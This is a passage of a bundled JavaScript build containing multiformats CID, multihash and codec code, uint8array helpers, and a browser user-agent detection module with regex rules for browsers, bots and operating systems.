        $fa05a038af787ba8$exports.decode.bytes
    ];
};
const $32dd57f0aae68c66$var$encodeTo = (int, target, offset = 0)=>{
    $fa05a038af787ba8$exports.encode(int, target, offset);
    return target;
};
const $32dd57f0aae68c66$var$encodingLength = (int)=>{
    return $fa05a038af787ba8$exports.encodingLength(int);
};
$32dd57f0aae68c66$exports.decode = $32dd57f0aae68c66$var$decode;
$32dd57f0aae68c66$exports.encodeTo = $32dd57f0aae68c66$var$encodeTo;
$32dd57f0aae68c66$exports.encodingLength = $32dd57f0aae68c66$var$encodingLength;


const $f302a42295b946b3$var$create = (code, digest)=>{
    const size = digest.byteLength;
    const sizeOffset = $32dd57f0aae68c66$exports.encodingLength(code);
    const digestOffset = sizeOffset + $32dd57f0aae68c66$exports.encodingLength(size);
    const bytes = new Uint8Array(digestOffset + size);
    $32dd57f0aae68c66$exports.encodeTo(code, bytes, 0);
    $32dd57f0aae68c66$exports.encodeTo(size, bytes, sizeOffset);
    bytes.set(digest, digestOffset);
    return new $f302a42295b946b3$var$Digest(code, size, digest, bytes);
};
const $f302a42295b946b3$var$decode = (multihash)=>{
    const bytes$1 = $4d55dbc11a5f1aec$exports.coerce(multihash);
    const [code, sizeOffset] = $32dd57f0aae68c66$exports.decode(bytes$1);
    const [size, digestOffset] = $32dd57f0aae68c66$exports.decode(bytes$1.subarray(sizeOffset));
    const digest = bytes$1.subarray(sizeOffset + digestOffset);
    if (digest.byteLength !== size) throw new Error("Incorrect length");
    return new $f302a42295b946b3$var$Digest(code, size, digest, bytes$1);
};
const $f302a42295b946b3$var$equals = (a, b)=>{
    if (a === b) return true;
    else return a.code === b.code && a.size === b.size && $4d55dbc11a5f1aec$exports.equals(a.bytes, b.bytes);
};
class $f302a42295b946b3$var$Digest {
    constructor(code, size, digest, bytes){
        this.code = code;
        this.size = size;
        this.digest = digest;
        this.bytes = bytes;
    }
}
$f302a42295b946b3$exports.Digest = $f302a42295b946b3$var$Digest;
$f302a42295b946b3$exports.create = $f302a42295b946b3$var$create;
$f302a42295b946b3$exports.decode = $f302a42295b946b3$var$decode;
$f302a42295b946b3$exports.equals = $f302a42295b946b3$var$equals;


const $baed353b52eedd46$var$from = ({ name: name, code: code, encode: encode })=>new $baed353b52eedd46$var$Hasher(name, code, encode);
class $baed353b52eedd46$var$Hasher {
    constructor(name, code, encode){
        this.name = name;
        this.code = code;
        this.encode = encode;
    }
    digest(input) {
        if (input instanceof Uint8Array) {
            const result = this.encode(input);
            return result instanceof Uint8Array ? $f302a42295b946b3$exports.create(this.code, result) : result.then((digest$1)=>$f302a42295b946b3$exports.create(this.code, digest$1));
        } else throw Error("Unknown type, must be binary type");
    }
}
$baed353b52eedd46$exports.Hasher = $baed353b52eedd46$var$Hasher;
$baed353b52eedd46$exports.from = $baed353b52eedd46$var$from;


const $fc5536b924e664f3$var$sha = (name)=>async (data)=>new Uint8Array(await crypto.subtle.digest(name, data));
const $fc5536b924e664f3$var$sha256 = $baed353b52eedd46$exports.from({
    name: "sha2-256",
    code: 18,
    encode: $fc5536b924e664f3$var$sha("SHA-256")
});
const $fc5536b924e664f3$var$sha512 = $baed353b52eedd46$exports.from({
    name: "sha2-512",
    code: 19,
    encode: $fc5536b924e664f3$var$sha("SHA-512")
});
$fc5536b924e664f3$exports.sha256 = $fc5536b924e664f3$var$sha256;
$fc5536b924e664f3$exports.sha512 = $fc5536b924e664f3$var$sha512;


var $60ad3b9242aa2ade$exports = {};
"use strict";
Object.defineProperty($60ad3b9242aa2ade$exports, "__esModule", {
    value: true
});


const $60ad3b9242aa2ade$var$code = 0;
const $60ad3b9242aa2ade$var$name = "identity";
const $60ad3b9242aa2ade$var$encode = $4d55dbc11a5f1aec$exports.coerce;
const $60ad3b9242aa2ade$var$digest = (input)=>$f302a42295b946b3$exports.create($60ad3b9242aa2ade$var$code, $60ad3b9242aa2ade$var$encode(input));
const $60ad3b9242aa2ade$var$identity = {
    code: $60ad3b9242aa2ade$var$code,
    name: $60ad3b9242aa2ade$var$name,
    encode: $60ad3b9242aa2ade$var$encode,
    digest: $60ad3b9242aa2ade$var$digest
};
$60ad3b9242aa2ade$exports.identity = $60ad3b9242aa2ade$var$identity;


var $00eb0d0ec1c470ae$exports = {};
"use strict";
Object.defineProperty($00eb0d0ec1c470ae$exports, "__esModule", {
    value: true
});

const $00eb0d0ec1c470ae$var$name = "raw";
const $00eb0d0ec1c470ae$var$code = 85;
const $00eb0d0ec1c470ae$var$encode = (node)=>$4d55dbc11a5f1aec$exports.coerce(node);
const $00eb0d0ec1c470ae$var$decode = (data)=>$4d55dbc11a5f1aec$exports.coerce(data);
$00eb0d0ec1c470ae$exports.code = $00eb0d0ec1c470ae$var$code;
$00eb0d0ec1c470ae$exports.decode = $00eb0d0ec1c470ae$var$decode;
$00eb0d0ec1c470ae$exports.encode = $00eb0d0ec1c470ae$var$encode;
$00eb0d0ec1c470ae$exports.name = $00eb0d0ec1c470ae$var$name;


var $5df44c55fa70023d$exports = {};
"use strict";
Object.defineProperty($5df44c55fa70023d$exports, "__esModule", {
    value: true
});
const $5df44c55fa70023d$var$textEncoder = new TextEncoder();
const $5df44c55fa70023d$var$textDecoder = new TextDecoder();
const $5df44c55fa70023d$var$name = "json";
const $5df44c55fa70023d$var$code = 512;
const $5df44c55fa70023d$var$encode = (node)=>$5df44c55fa70023d$var$textEncoder.encode(JSON.stringify(node));
const $5df44c55fa70023d$var$decode = (data)=>JSON.parse($5df44c55fa70023d$var$textDecoder.decode(data));
$5df44c55fa70023d$exports.code = $5df44c55fa70023d$var$code;
$5df44c55fa70023d$exports.decode = $5df44c55fa70023d$var$decode;
$5df44c55fa70023d$exports.encode = $5df44c55fa70023d$var$encode;
$5df44c55fa70023d$exports.name = $5df44c55fa70023d$var$name;


var $ce2f798d02e53aa4$exports = {};
"use strict";
Object.defineProperty($ce2f798d02e53aa4$exports, "__esModule", {
    value: true
});
var $75176e30f12252bd$exports = {};
"use strict";
Object.defineProperty($75176e30f12252bd$exports, "__esModule", {
    value: true
});





class $75176e30f12252bd$var$CID {
    constructor(version, code, multihash, bytes){
        this.code = code;
        this.version = version;
        this.multihash = multihash;
        this.bytes = bytes;
        this.byteOffset = bytes.byteOffset;
        this.byteLength = bytes.byteLength;
        this.asCID = this;
        this._baseCache = new Map();
        Object.defineProperties(this, {
            byteOffset: $75176e30f12252bd$var$hidden,
            byteLength: $75176e30f12252bd$var$hidden,
            code: $75176e30f12252bd$var$readonly,
            version: $75176e30f12252bd$var$readonly,
            multihash: $75176e30f12252bd$var$readonly,
            bytes: $75176e30f12252bd$var$readonly,
            _baseCache: $75176e30f12252bd$var$hidden,
            asCID: $75176e30f12252bd$var$hidden
        });
    }
    toV0() {
        switch(this.version){
            case 0:
                return this;
            default:
                {
                    const { code: code, multihash: multihash } = this;
                    if (code !== $75176e30f12252bd$var$DAG_PB_CODE) throw new Error("Cannot convert a non dag-pb CID to CIDv0");
                    if (multihash.code !== $75176e30f12252bd$var$SHA_256_CODE) throw new Error("Cannot convert non sha2-256 multihash CID to CIDv0");
                    return $75176e30f12252bd$var$CID.createV0(multihash);
                }
        }
    }
    toV1() {
        switch(this.version){
            case 0:
                {
                    const { code: code, digest: digest$1 } = this.multihash;
                    const multihash = $f302a42295b946b3$exports.create(code, digest$1);
                    return $75176e30f12252bd$var$CID.createV1(this.code, multihash);
                }
            case 1:
                return this;
            default:
                throw Error(`Can not convert CID version ${this.version} to version 0. This is a bug please report`);
        }
    }
    equals(other) {
        return other && this.code === other.code && this.version === other.version && $f302a42295b946b3$exports.equals(this.multihash, other.multihash);
    }
    toString(base) {
        const { bytes: bytes, version: version, _baseCache: _baseCache } = this;
        switch(version){
            case 0:
                return $75176e30f12252bd$var$toStringV0(bytes, _baseCache, base || $bb23e06a31e86f7c$exports.base58btc.encoder);
            default:
                return $75176e30f12252bd$var$toStringV1(bytes, _baseCache, base || $6d183b7418ac11d8$exports.base32.encoder);
        }
    }
    toJSON() {
        return {
            code: this.code,
            version: this.version,
            hash: this.multihash.bytes
        };
    }
    get [Symbol.toStringTag]() {
        return "CID";
    }
    [Symbol.for("nodejs.util.inspect.custom")]() {
        return "CID(" + this.toString() + ")";
    }
    static isCID(value) {
        $75176e30f12252bd$var$deprecate(/^0\.0/, $75176e30f12252bd$var$IS_CID_DEPRECATION);
        return !!(value && (value[$75176e30f12252bd$var$cidSymbol] || value.asCID === value));
    }
    get toBaseEncodedString() {
        throw new Error("Deprecated, use .toString()");
    }
    get codec() {
        throw new Error('"codec" property is deprecated, use integer "code" property instead');
    }
    get buffer() {
        throw new Error("Deprecated .buffer property, use .bytes to get Uint8Array instead");
    }
    get multibaseName() {
        throw new Error('"multibaseName" property is deprecated');
    }
    get prefix() {
        throw new Error('"prefix" property is deprecated');
    }
    static asCID(value) {
        if (value instanceof $75176e30f12252bd$var$CID) return value;
        else if (value != null && value.asCID === value) {
            const { version: version, code: code, multihash: multihash, bytes: bytes } = value;
            return new $75176e30f12252bd$var$CID(version, code, multihash, bytes || $75176e30f12252bd$var$encodeCID(version, code, multihash.bytes));
        } else if (value != null && value[$75176e30f12252bd$var$cidSymbol] === true) {
            const { version: version, multihash: multihash, code: code } = value;
            const digest$1 = $f302a42295b946b3$exports.decode(multihash);
            return $75176e30f12252bd$var$CID.create(version, code, digest$1);
        } else return null;
    }
    static create(version, code, digest) {
        if (typeof code !== "number") throw new Error("String codecs are no longer supported");
        switch(version){
            case 0:
                if (code !== $75176e30f12252bd$var$DAG_PB_CODE) throw new Error(`Version 0 CID must use dag-pb (code: ${$75176e30f12252bd$var$DAG_PB_CODE}) block encoding`);
                else return new $75176e30f12252bd$var$CID(version, code, digest, digest.bytes);
            case 1:
                {
                    const bytes = $75176e30f12252bd$var$encodeCID(version, code, digest.bytes);
                    return new $75176e30f12252bd$var$CID(version, code, digest, bytes);
                }
            default:
                throw new Error("Invalid version");
        }
    }
    static createV0(digest) {
        return $75176e30f12252bd$var$CID.create(0, $75176e30f12252bd$var$DAG_PB_CODE, digest);
    }
    static createV1(code, digest) {
        return $75176e30f12252bd$var$CID.create(1, code, digest);
    }
    static decode(bytes) {
        const [cid, remainder] = $75176e30f12252bd$var$CID.decodeFirst(bytes);
        if (remainder.length) throw new Error("Incorrect length");
        return cid;
    }
    static decodeFirst(bytes$1) {
        const specs = $75176e30f12252bd$var$CID.inspectBytes(bytes$1);
        const prefixSize = specs.size - specs.multihashSize;
        const multihashBytes = $4d55dbc11a5f1aec$exports.coerce(bytes$1.subarray(prefixSize, prefixSize + specs.multihashSize));
        if (multihashBytes.byteLength !== specs.multihashSize) throw new Error("Incorrect length");
        const digestBytes = multihashBytes.subarray(specs.multihashSize - specs.digestSize);
        const digest$1 = new $f302a42295b946b3$exports.Digest(specs.multihashCode, specs.digestSize, digestBytes, multihashBytes);
        const cid = specs.version === 0 ? $75176e30f12252bd$var$CID.createV0(digest$1) : $75176e30f12252bd$var$CID.createV1(specs.codec, digest$1);
        return [
            cid,
            bytes$1.subarray(specs.size)
        ];
    }
    static inspectBytes(initialBytes) {
        let offset = 0;
        const next = ()=>{
            const [i, length] = $32dd57f0aae68c66$exports.decode(initialBytes.subarray(offset));
            offset += length;
            return i;
        };
        let version = next();
        let codec = $75176e30f12252bd$var$DAG_PB_CODE;
        if (version === 18) {
            version = 0;
            offset = 0;
        } else if (version === 1) codec = next();
        if (version !== 0 && version !== 1) throw new RangeError(`Invalid CID version ${version}`);
        const prefixSize = offset;
        const multihashCode = next();
        const digestSize = next();
        const size = offset + digestSize;
        const multihashSize = size - prefixSize;
        return {
            version: version,
            codec: codec,
            multihashCode: multihashCode,
            digestSize: digestSize,
            multihashSize: multihashSize,
            size: size
        };
    }
    static parse(source, base) {
        const [prefix, bytes] = $75176e30f12252bd$var$parseCIDtoBytes(source, base);
        const cid = $75176e30f12252bd$var$CID.decode(bytes);
        cid._baseCache.set(prefix, source);
        return cid;
    }
}
const $75176e30f12252bd$var$parseCIDtoBytes = (source, base)=>{
    switch(source[0]){
        case "Q":
            {
                const decoder = base || $bb23e06a31e86f7c$exports.base58btc;
                return [
                    $bb23e06a31e86f7c$exports.base58btc.prefix,
                    decoder.decode(`${$bb23e06a31e86f7c$exports.base58btc.prefix}${source}`)
                ];
            }
        case $bb23e06a31e86f7c$exports.base58btc.prefix:
            {
                const decoder = base || $bb23e06a31e86f7c$exports.base58btc;
                return [
                    $bb23e06a31e86f7c$exports.base58btc.prefix,
                    decoder.decode(source)
                ];
            }
        case $6d183b7418ac11d8$exports.base32.prefix:
            {
                const decoder = base || $6d183b7418ac11d8$exports.base32;
                return [
                    $6d183b7418ac11d8$exports.base32.prefix,
                    decoder.decode(source)
                ];
            }
        default:
            if (base == null) throw Error("To parse non base32 or base58btc encoded CID multibase decoder must be provided");
            return [
                source[0],
                base.decode(source)
            ];
    }
};
const $75176e30f12252bd$var$toStringV0 = (bytes, cache, base)=>{
    const { prefix: prefix } = base;
    if (prefix !== $bb23e06a31e86f7c$exports.base58btc.prefix) throw Error(`Cannot string encode V0 in ${base.name} encoding`);
    const cid = cache.get(prefix);
    if (cid == null) {
        const cid = base.encode(bytes).slice(1);
        cache.set(prefix, cid);
        return cid;
    } else return cid;
};
const $75176e30f12252bd$var$toStringV1 = (bytes, cache, base)=>{
    const { prefix: prefix } = base;
    const cid = cache.get(prefix);
    if (cid == null) {
        const cid = base.encode(bytes);
        cache.set(prefix, cid);
        return cid;
    } else return cid;
};
const $75176e30f12252bd$var$DAG_PB_CODE = 112;
const $75176e30f12252bd$var$SHA_256_CODE = 18;
const $75176e30f12252bd$var$encodeCID = (version, code, multihash)=>{
    const codeOffset = $32dd57f0aae68c66$exports.encodingLength(version);
    const hashOffset = codeOffset + $32dd57f0aae68c66$exports.encodingLength(code);
    const bytes = new Uint8Array(hashOffset + multihash.byteLength);
    $32dd57f0aae68c66$exports.encodeTo(version, bytes, 0);
    $32dd57f0aae68c66$exports.encodeTo(code, bytes, codeOffset);
    bytes.set(multihash, hashOffset);
    return bytes;
};
const $75176e30f12252bd$var$cidSymbol = Symbol.for("@ipld/js-cid/CID");
const $75176e30f12252bd$var$readonly = {
    writable: false,
    configurable: false,
    enumerable: true
};
const $75176e30f12252bd$var$hidden = {
    writable: false,
    enumerable: false,
    configurable: false
};
const $75176e30f12252bd$var$version = "0.0.0-dev";
const $75176e30f12252bd$var$deprecate = (range, message)=>{
    if (range.test($75176e30f12252bd$var$version)) console.warn(message);
    else throw new Error(message);
};
const $75176e30f12252bd$var$IS_CID_DEPRECATION = `CID.isCID(v) is deprecated and will be removed in the next major release.
Following code pattern:

if (CID.isCID(value)) {
  doSomethingWithCID(value)
}

Is replaced with:

const cid = CID.asCID(value)
if (cid) {
  // Make sure to use cid instead of value
  doSomethingWithCID(cid)
}
`;
$75176e30f12252bd$exports.CID = $75176e30f12252bd$var$CID;






$ce2f798d02e53aa4$exports.CID = $75176e30f12252bd$exports.CID;
$ce2f798d02e53aa4$exports.varint = $32dd57f0aae68c66$exports;
$ce2f798d02e53aa4$exports.bytes = $4d55dbc11a5f1aec$exports;
$ce2f798d02e53aa4$exports.hasher = $baed353b52eedd46$exports;
$ce2f798d02e53aa4$exports.digest = $f302a42295b946b3$exports;







const $b633fa38a7f8a649$var$bases = {
    ...$fab4e33fc8c0336e$exports,
    ...$444f725972ab843c$exports,
    ...$7330be652d1faeae$exports,
    ...$7c7f7dd3c1547a66$exports,
    ...$4e3d0e6f3707af45$exports,
    ...$6d183b7418ac11d8$exports,
    ...$2478ed668ff199ad$exports,
    ...$bb23e06a31e86f7c$exports,
    ...$de0d70bb34ca5e4e$exports,
    ...$c9e395f0a3e1277d$exports
};
const $b633fa38a7f8a649$var$hashes = {
    ...$fc5536b924e664f3$exports,
    ...$60ad3b9242aa2ade$exports
};
const $b633fa38a7f8a649$var$codecs = {
    raw: $00eb0d0ec1c470ae$exports,
    json: $5df44c55fa70023d$exports
};
$b633fa38a7f8a649$exports.CID = $75176e30f12252bd$exports.CID;
$b633fa38a7f8a649$exports.hasher = $baed353b52eedd46$exports;
$b633fa38a7f8a649$exports.digest = $f302a42295b946b3$exports;
$b633fa38a7f8a649$exports.varint = $32dd57f0aae68c66$exports;
$b633fa38a7f8a649$exports.bytes = $4d55dbc11a5f1aec$exports;
$b633fa38a7f8a649$exports.bases = $b633fa38a7f8a649$var$bases;
$b633fa38a7f8a649$exports.codecs = $b633fa38a7f8a649$var$codecs;
$b633fa38a7f8a649$exports.hashes = $b633fa38a7f8a649$var$hashes;



function $5884b53a084a924d$var$createCodec(name, prefix, encode, decode) {
    return {
        name: name,
        prefix: prefix,
        encoder: {
            name: name,
            prefix: prefix,
            encode: encode
        },
        decoder: {
            decode: decode
        }
    };
}
const $5884b53a084a924d$var$string = $5884b53a084a924d$var$createCodec("utf8", "u", (buf)=>{
    const decoder = new TextDecoder("utf8");
    return "u" + decoder.decode(buf);
}, (str)=>{
    const encoder = new TextEncoder();
    return encoder.encode(str.substring(1));
});
const $5884b53a084a924d$var$ascii = $5884b53a084a924d$var$createCodec("ascii", "a", (buf)=>{
    let string = "a";
    for(let i = 0; i < buf.length; i++)string += String.fromCharCode(buf[i]);
    return string;
}, (str)=>{
    str = str.substring(1);
    const buf = $6082a548169c7b42$exports.allocUnsafe(str.length);
    for(let i = 0; i < str.length; i++)buf[i] = str.charCodeAt(i);
    return buf;
});
const $5884b53a084a924d$var$BASES = {
    utf8: $5884b53a084a924d$var$string,
    "utf-8": $5884b53a084a924d$var$string,
    hex: $b633fa38a7f8a649$exports.bases.base16,
    latin1: $5884b53a084a924d$var$ascii,
    ascii: $5884b53a084a924d$var$ascii,
    binary: $5884b53a084a924d$var$ascii,
    ...$b633fa38a7f8a649$exports.bases
};
$5884b53a084a924d$exports = $5884b53a084a924d$var$BASES;



function $a4ed053a1131469e$var$fromString(string, encoding = "utf8") {
    const base = $5884b53a084a924d$exports[encoding];
    if (!base) throw new Error(`Unsupported encoding "${encoding}"`);
    if ((encoding === "utf8" || encoding === "utf-8") && globalThis.Buffer != null && globalThis.Buffer.from != null) return $784ac8dd0f23c14d$exports.asUint8Array(globalThis.Buffer.from(string, "utf-8"));
    return base.decoder.decode(`${base.prefix}${string}`);
}
$a4ed053a1131469e$exports.fromString = $a4ed053a1131469e$var$fromString;


var $bdf44057d833ab1f$exports = {};
"use strict";
Object.defineProperty($bdf44057d833ab1f$exports, "__esModule", {
    value: true
});

function $bdf44057d833ab1f$var$toString(array, encoding = "utf8") {
    const base = $5884b53a084a924d$exports[encoding];
    if (!base) throw new Error(`Unsupported encoding "${encoding}"`);
    if ((encoding === "utf8" || encoding === "utf-8") && globalThis.Buffer != null && globalThis.Buffer.from != null) return globalThis.Buffer.from(array.buffer, array.byteOffset, array.byteLength).toString("utf8");
    return base.encoder.encode(array).substring(1);
}
$bdf44057d833ab1f$exports.toString = $bdf44057d833ab1f$var$toString;


var $61fd98a3451cab50$exports = {};
"use strict";
Object.defineProperty($61fd98a3451cab50$exports, "__esModule", {
    value: true
});


function $61fd98a3451cab50$var$xor(a, b) {
    if (a.length !== b.length) throw new Error("Inputs should have the same length");
    const result = $6082a548169c7b42$exports.allocUnsafe(a.length);
    for(let i = 0; i < a.length; i++)result[i] = a[i] ^ b[i];
    return $784ac8dd0f23c14d$exports.asUint8Array(result);
}
$61fd98a3451cab50$exports.xor = $61fd98a3451cab50$var$xor;


$74e9859baf4497ef$exports.compare = $3a397656998e9fe7$exports.compare;
$74e9859baf4497ef$exports.concat = $475c4a512fd4a246$exports.concat;
$74e9859baf4497ef$exports.equals = $41b0be3b2401ec7e$exports.equals;
$74e9859baf4497ef$exports.fromString = $a4ed053a1131469e$exports.fromString;
$74e9859baf4497ef$exports.toString = $bdf44057d833ab1f$exports.toString;
$74e9859baf4497ef$exports.xor = $61fd98a3451cab50$exports.xor;


var $48968958eb8b72e8$exports = {};

$parcel$export($48968958eb8b72e8$exports, "detect", () => $48968958eb8b72e8$export$17b446b869dad473);

var $hPtJY = parcelRequire("hPtJY");
var $48968958eb8b72e8$var$__spreadArray = undefined && undefined.__spreadArray || function(to, from, pack) {
    if (pack || arguments.length === 2) {
        for(var i = 0, l = from.length, ar; i < l; i++)if (ar || !(i in from)) {
            if (!ar) ar = Array.prototype.slice.call(from, 0, i);
            ar[i] = from[i];
        }
    }
    return to.concat(ar || Array.prototype.slice.call(from));
};
var $48968958eb8b72e8$export$8fa985da04a86f0 = /** @class */ function() {
    function BrowserInfo(name, version, os) {
        this.name = name;
        this.version = version;
        this.os = os;
        this.type = "browser";
    }
    return BrowserInfo;
}();
var $48968958eb8b72e8$export$62457c674e0167c0 = /** @class */ function() {
    function NodeInfo(version) {
        this.version = version;
        this.type = "node";
        this.name = "node";
        this.os = $hPtJY.platform;
    }
    return NodeInfo;
}();
var $48968958eb8b72e8$export$775de176f06fc21 = /** @class */ function() {
    function SearchBotDeviceInfo(name, version, os, bot) {
        this.name = name;
        this.version = version;
        this.os = os;
        this.bot = bot;
        this.type = "bot-device";
    }
    return SearchBotDeviceInfo;
}();
var $48968958eb8b72e8$export$cb435e1e9f86c1ff = /** @class */ function() {
    function BotInfo() {
        this.type = "bot";
        this.bot = true; // NOTE: deprecated test name instead
        this.name = "bot";
        this.version = null;
        this.os = null;
    }
    return BotInfo;
}();
var $48968958eb8b72e8$export$7c78fe95a9d9b03e = /** @class */ function() {
    function ReactNativeInfo() {
        this.type = "react-native";
        this.name = "react-native";
        this.version = null;
        this.os = null;
    }
    return ReactNativeInfo;
}();
// tslint:disable-next-line:max-line-length
var $48968958eb8b72e8$var$SEARCHBOX_UA_REGEX = /alexa|bot|crawl(er|ing)|facebookexternalhit|feedburner|google web preview|nagios|postrank|pingdom|slurp|spider|yahoo!|yandex/;
var $48968958eb8b72e8$var$SEARCHBOT_OS_REGEX = /(nuhk|curl|Googlebot|Yammybot|Openbot|Slurp|MSNBot|Ask\ Jeeves\/Teoma|ia_archiver)/;
var $48968958eb8b72e8$var$REQUIRED_VERSION_PARTS = 3;
var $48968958eb8b72e8$var$userAgentRules = [
    [
        "aol",
        /AOLShield\/([0-9\._]+)/
    ],
    [
        "edge",
        /Edge\/([0-9\._]+)/
    ],
    [
        "edge-ios",
        /EdgiOS\/([0-9\._]+)/
    ],
    [
        "yandexbrowser",
        /YaBrowser\/([0-9\._]+)/
    ],
    [
        "kakaotalk",
        /KAKAOTALK\s([0-9\.]+)/
    ],
    [
        "samsung",
        /SamsungBrowser\/([0-9\.]+)/
    ],
    [
        "silk",
        /\bSilk\/([0-9._-]+)\b/
    ],
    [
        "miui",
        /MiuiBrowser\/([0-9\.]+)$/
    ],
    [
        "beaker",
        /BeakerBrowser\/([0-9\.]+)/
    ],
    [
        "edge-chromium",
        /EdgA?\/([0-9\.]+)/
    ],
    [
        "chromium-webview",
        /(?!Chrom.*OPR)wv\).*Chrom(?:e|ium)\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "chrome",
        /(?!Chrom.*OPR)Chrom(?:e|ium)\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "phantomjs",
        /PhantomJS\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "crios",
        /CriOS\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "firefox",
        /Firefox\/([0-9\.]+)(?:\s|$)/
    ],
    [
        "fxios",
        /FxiOS\/([0-9\.]+)/
    ],
    [
        "opera-mini",
        /Opera Mini.*Version\/([0-9\.]+)/
    ],
    [
        "opera",
        /Opera\/([0-9\.]+)(?:\s|$)/
    ],
    [
        "opera",
        /OPR\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "pie",
        /^Microsoft Pocket Internet Explorer\/(\d+\.\d+)$/
    ],
    [
        "pie",
        /^Mozilla\/\d\.\d+\s\(compatible;\s(?:MSP?IE|MSInternet Explorer) (\d+\.\d+);.*Windows CE.*\)$/
    ],
    [
        "netfront",
        /^Mozilla\/\d\.\d+.*NetFront\/(\d.\d)/
    ],
    [
        "ie",
        /Trident\/7\.0.*rv\:([0-9\.]+).*\).*Gecko$/
    ],
    [
        "ie",
        /MSIE\s([0-9\.]+);.*Trident\/[4-7].0/
    ],
    [
        "ie",
        /MSIE\s(7\.0)/
    ],
    [
        "bb10",
        /BB10;\sTouch.*Version\/([0-9\.]+)/
    ],
    [
        "android",
        /Android\s([0-9\.]+)/
    ],
    [
        "ios",
        /Version\/([0-9\._]+).*Mobile.*Safari.*/
    ],
    [
        "safari",
        /Version\/([0-9\._]+).*Safari/
    ],
    [
        "facebook",
        /FB[AS]V\/([0-9\.]+)/
    ],
    [
        "instagram",
        /Instagram\s([0-9\.]+)/
    ],
    [
        "ios-webview",
        /AppleWebKit\/([0-9\.]+).*Mobile/
    ],
    [
        "ios-webview",
        /AppleWebKit\/([0-9\.]+).*Gecko\)$/
    ],
    [
        "curl",
        /^curl\/([0-9\.]+)$/
    ],
    [
        "searchbot",
        $48968958eb8b72e8$var$SEARCHBOX_UA_REGEX
    ]
];
var $48968958eb8b72e8$var$operatingSystemRules = [
    [
        "iOS",
        /iP(hone|od|ad)/
    ],
    [
        "Android OS",
        /Android/
    ],
    [
        "BlackBerry OS",
        /BlackBerry|BB10/
    ],
    [
        "Windows Mobile",
        /IEMobile/
    ],
    [
        "Amazon OS",
        /Kindle/
    ],
    [
        "Windows 3.11",
        /Win16/
    ],
    [
        "Windows 95",
        /(Windows 95)|(Win95)|(Windows_95)/
    ],
    [
        "Windows 98",
        /(Windows 98)|(Win98)/
    ],
    [
        "Windows 2000",
        /(Windows NT 5.0)|(Windows 2000)/
    ],
    [
        "Windows XP",
        /(Windows NT 5.1)|(Windows XP)/
    ],
    [
        "Windows Server 2003",
        /(Windows NT 5.2)/
    ],
    [
        "Windows Vista",
        /(Windows NT 6.0)/
    ],
    [
        "Windows 7",
        /(Windows NT 6.1)/
    ],
    [
        "Windows 8",
        /(Windows NT 6.2)/
    ],
    [
        "Windows 8.1",
        /(Windows NT 6.3)/
    ],
    [
        "Windows 10",
        /(Windows NT 10.0)/
    ],
    [
        "Windows ME",
        /Windows ME/
    ],
    [
        "Windows CE",
        /Windows CE|WinCE|Microsoft Pocket Internet Explorer/
    ],
    [
        "Open BSD",
        /OpenBSD/
    ],
    [
        "Sun OS",
        /SunOS/
    ],
    [
        "Chrome OS",
        /CrOS/
    ],
    [
        "Linux",
        /(Linux)|(X11)/
    ],
    [
        "Mac OS",
        /(Mac_PowerPC)|(Macintosh)/
    ],
    [
        "QNX",
        /QNX/
    ],
    [
        "BeOS",
        /BeOS/
    ],
    [
        "OS/2",
        /OS\/2/
    ]
];
function $48968958eb8b72e8$export$17b446b869dad473(userAgent) {
    if (!!userAgent) return $48968958eb8b72e8$export$1184956100eddc3c(userAgent);
    if (typeof document === "undefined" && typeof navigator !== "undefined" && navigator.product === "ReactNative") return new $48968958eb8b72e8$export$7c78fe95a9d9b03e();
    if (typeof navigator !== "undefined") return $48968958eb8b72e8$export$1184956100eddc3c(navigator.userAgent);
    return $48968958eb8b72e8$export$bf2c6630ab904918();
}
function $48968958eb8b72e8$var$matchUserAgent(ua) {
    // opted for using reduce here rather than Array#first with a regex.test call
    // this is primarily because using the reduce we only perform the regex
    // execution once rather than once for the test and for the exec again below
    // probably something that needs to be benchmarked though
    return ua !== "" && $48968958eb8b72e8$var$userAgentRules.reduce(function(matched, _a) {
        var browser = _a[0], regex = _a[1];
        if (matched) return matched;
        var uaMatch = regex.exec(ua);
        return !!uaMatch && [
            browser,
            uaMatch
        ];
    }, false);
}
function $48968958eb8b72e8$export$89ca9f8ca1a50fd5(ua) {
    var data = $48968958eb8b72e8$var$matchUserAgent(ua);
    return data ? data[0] : null;
}
function $48968958eb8b72e8$export$1184956100eddc3c(ua) {
    var matchedRule = $48968958eb8b72e8$var$matchUserAgent(ua);
    if (!matchedRule) return null;
    var name = matchedRule[0], match = matchedRule[1];
    if (name === "searchbot") return new $48968958eb8b72e8$export$cb435e1e9f86c1ff();
    // Do not use RegExp for split operation as some browser do not support it (See: http://blog.stevenlevithan.com/archives/cross-browser-split)
    var versionParts = match[1] && match[1].split(".").join("_").split("_").slice(0, 3);
    if (versionParts) {
        if (versionParts.length < $48968958eb8b72e8$var$REQUIRED_VERSION_PARTS) versionParts = $48968958eb8b72e8$var$__spreadArray($48968958eb8b72e8$var$__spreadArray([], versionParts, true), $48968958eb8b72e8$var$createVersionParts($48968958eb8b72e8$var$REQUIRED_VERSION_PARTS - versionParts.length), true);
    } else versionParts = [];
    var version = versionParts.join(".");
    var os = $48968958eb8b72e8$export$3070bd282ec37ea8(ua);
    var searchBotMatch = $48968958eb8b72e8$var$SEARCHBOT_OS_REGEX.exec(ua);
    if (searchBotMatch && searchBotMatch[1]) return new $48968958eb8b72e8$export$775de176f06fc21(name, version, os, searchBotMatch[1]);
    return new $48968958eb8b72e8$export$8fa985da04a86f0(name, version, os);
}
function $48968958eb8b72e8$export$3070bd282ec37ea8(ua) {
    for(var ii = 0, count = $48968958eb8b72e8$var$operatingSystemRules.length; ii < count; ii++){
        var _a = $48968958eb8b72e8$var$operatingSystemRules[ii], os = _a[0], regex = _a[1];
        var match = regex.exec(ua);
        if (match) return os;
    }
    return null;
}
function $48968958eb8b72e8$export$bf2c6630ab904918() {
    var isNode = typeof $hPtJY !== "undefined" && $hPtJY.version;
    return isNode ? new $48968958eb8b72e8$export$62457c674e0167c0($hPtJY.version.slice(1)) : null;
}
function $48968958eb8b72e8$var$createVersionParts(count) {
    var output = [];
    for(var ii = 0; ii < count; ii++)output.push("0");
    return output;
}



var $aG48A = parcelRequire("aG48A");
var $9cba2bd26fe13e26$exports = {};
"use strict";
Object.defineProperty($9cba2bd26fe13e26$exports, "__esModule", {
    value: true
});
